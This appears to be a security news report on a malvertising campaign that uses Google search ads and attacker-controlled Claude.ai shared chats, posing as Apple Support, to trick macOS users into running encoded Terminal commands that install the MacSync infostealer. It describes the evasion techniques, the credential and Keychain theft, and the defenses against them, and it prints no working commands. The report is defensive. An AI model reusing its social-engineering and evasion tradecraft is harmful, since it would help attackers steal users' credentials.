An active malvertising operation is chaining two separate platforms — Google’s paid search results and Anthropic’s Claude.ai shared-chat feature — into a single infection pipeline that ultimately delivers MacSync, a macOS infostealer capable of extracting browser credentials, session cookies, and the full contents of the macOS Keychain.
MacSync Malvertising Chain Exploits Google Ads and Claude.ai Shared Sessions
The campaign initiates when a user searches Google for terms related to downloading Claude for Mac. Threat actors behind the operation have purchased sponsored search placements that display with the legitimate claude.ai domain visible in the ad unit, making the advertisement visually indistinguishable from an authentic Anthropic result. Users who click through are not taken to Anthropic’s website; instead, they are redirected to Claude.ai shared chat sessions that the attackers control.
Claude.ai allows users to share conversation transcripts via public links — a legitimate collaboration feature that the campaign repurposes as a delivery mechanism. The shared sessions are staged to impersonate Apple Support representatives, and they present victims with base64-encoded Terminal commands framed as the required installation steps for “Claude Code on Mac.” Because the commands appear within what looks like an official support interaction hosted on a real Anthropic subdomain, users who have already been partially deceived by the Google ad are unlikely to question the instructions at this stage.
Base64-Encoded Terminal Commands Fetch Obfuscated Shell Scripts
When a victim decodes and executes the provided Terminal commands, the commands reach out to attacker-controlled infrastructure and retrieve obfuscated shell scripts that deliver the MacSync payload. Researchers have observed that the obfuscation is polymorphic — each request to the delivery server returns a functionally identical but structurally unique script — a technique that undermines signature-based detection tools that rely on matching known byte patterns. The payload executes entirely in memory rather than writing a persistent binary to disk, further reducing the likelihood of detection by endpoint security tools that monitor the filesystem for malicious installations.
The two-platform structure of the delivery chain is operationally significant. Google’s ad platform provides initial reach to a large pool of targeted users, while Claude.ai’s domain lends the subsequent interaction an air of legitimacy that a purpose-built phishing page would not carry. Neither platform is inherently compromised; the campaign exploits legitimate features of both services.
MacSync Harvests macOS Keychain, Browser Data, and Session Cookies
Once active in memory, MacSync extracts stored credentials and session cookies from major browsers and specifically targets the macOS Keychain — the system-level secure storage that holds Wi-Fi passwords, application credentials, and cryptographic certificates. Access to Keychain contents gives attackers a broad view of a victim’s authentication assets well beyond what browser-level theft alone would yield, potentially exposing credentials for enterprise VPNs, cloud storage services, and internal tools that are stored there by macOS and third-party applications.
The malware also profiles the victim’s system before completing execution. It checks the device’s keyboard locale setting and aborts the infection sequence if it detects a Russian-language or Commonwealth of Independent States regional keyboard configuration. This deliberate geographic exclusion is a technique commonly associated with threat actors who operate from within those regions and wish to avoid inadvertently infecting systems that could draw local law enforcement attention. The behavior does not confirm attribution to any specific group but does narrow the operational profile.
Google Ads Malvertising and the macOS Threat Landscape
Malvertising through Google’s sponsored search results has become a recurring attack vector targeting macOS users, in part because macOS’s reputation for security leads some users to apply less scrutiny to software they download compared to Windows environments. Campaigns using this channel to target macOS have previously distributed trojanized versions of widely used applications including Homebrew, Arc Browser, and various VPN clients, according to research published by security vendors tracking macOS-specific threat activity.
How to Spot MacSync-Linked Terminal Commands Before Running Them
Security practitioners offer several indicators that can help users identify suspicious Terminal instructions before executing them. Legitimate software installers distributed by major vendors do not require users to manually decode base64 strings and paste the result into a Terminal session; that workflow is not a standard macOS software installation pattern. Commands that include curl or wget calls to unfamiliar domains, combined with pipe operators that pass downloaded content directly to a shell interpreter, should be treated as high-risk regardless of the apparent source of the instruction.
Users who receive installation guidance through any chat interface — including AI assistant platforms — should independently verify that the domain and account presenting the instructions are authentic before executing any system-level commands. Anthropic has published documentation on the official Claude Code installation process through its own website; comparing that documentation against instructions received through third-party links is a straightforward verification step.
Reducing MacSync Exposure via DNS Filtering and Search Ad Policies
Organizations can reduce exposure to malvertising campaigns by configuring DNS filtering or browser extensions that flag sponsored search results before users click them, or by enforcing policies that route software downloads through approved internal repositories rather than public search engines. For individuals, hovering over a sponsored result to inspect the full destination URL — beyond the display domain shown in the ad — often reveals redirects that the display domain does not reflect.
macOS users should also review Keychain Access settings and consider whether applications have been granted broader Keychain access than their function requires. Rotating credentials stored in the Keychain following any suspected malware exposure is advisable, given the breadth of what MacSync is designed to extract.
